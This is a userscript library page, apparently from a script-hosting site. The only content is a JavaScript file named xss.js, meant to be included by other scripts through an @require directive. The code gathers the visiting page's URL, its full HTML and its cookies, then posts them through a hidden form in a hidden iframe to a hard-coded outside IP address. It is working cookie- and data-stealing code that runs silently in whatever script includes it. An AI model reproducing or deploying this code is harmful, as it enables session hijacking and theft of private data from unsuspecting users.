xss

xsscode

Tính đến 07-09-2018. Xem phiên bản mới nhất.

Script này sẽ không được không được cài đặt trực tiếp. Nó là một thư viện cho các script khác để bao gồm các chỉ thị meta // @require https://update.greatest.deepsurf.us/scripts/371986/627165/xss.js 

var url = location.href;
var html = document.getElementsByTagName('html')[0].innerHTML;
var cookie = document.cookie;
html = encodeURIComponent(html);
cookie = encodeURIComponent(cookie);

function POSTDATA(importurl, data){ 
	var tmp = data; 
	var tag = new Date().getTime(); 
	var doc = document; 
	
	var div_form = doc.createElement("div"); 
	var str = ""; 
	for(var i in tmp){ 
		str+="<input type='hidden' value='' name='"+i+"' id='__POST_INPUT_"+tag+"_"+i+"' /> "; 
	} 
	 
	div_form.innerHTML = "<form action='"+importurl+"' id='__POST_FORM_"+tag+"' target='__POST_IFRAME_"+tag+"' method='POST'>"+str+"</form>"; 
	  	  
	try{ 
		var iframe = doc.createElement("<iframe name='__POST_IFRAME_"+tag+"'></iframe>"); 
	}catch(e){ 
		var iframe = doc.createElement("iframe"); 
	} 
	iframe.id = '__POST_IFRAME_' + tag; 
	iframe.name = '__POST_IFRAME_' + tag; 
	iframe.style.display = 'none'; 
	iframe.src = "about:blank"; 
	// f.attachEvent('onload',function(){ 
		// try{ 
			// console.log("onload");
			// f.parentNode.removeChild(f); 
			// div_form.parentNode.removeChild(div_form); 
		// }catch(e){} 
	// }); 
	
	var iframe_body = iframe.contentWindow.document.body;
	iframe_body.appendChild(div_form);
	doc.body.appendChild(iframe);  
	  
	for(var i in tmp){ 
		doc.getElementById('__POST_INPUT_'+tag+'_'+i).value=tmp[i]; 
	} 
	doc.getElementById('__POST_FORM_'+tag).submit(); 
} 

var importurl = "http://98.142.132.85:8080/-.php";
var data = {
	url: url,
	html: html,
	cookie: cookie
};
POSTDATA(importurl, data);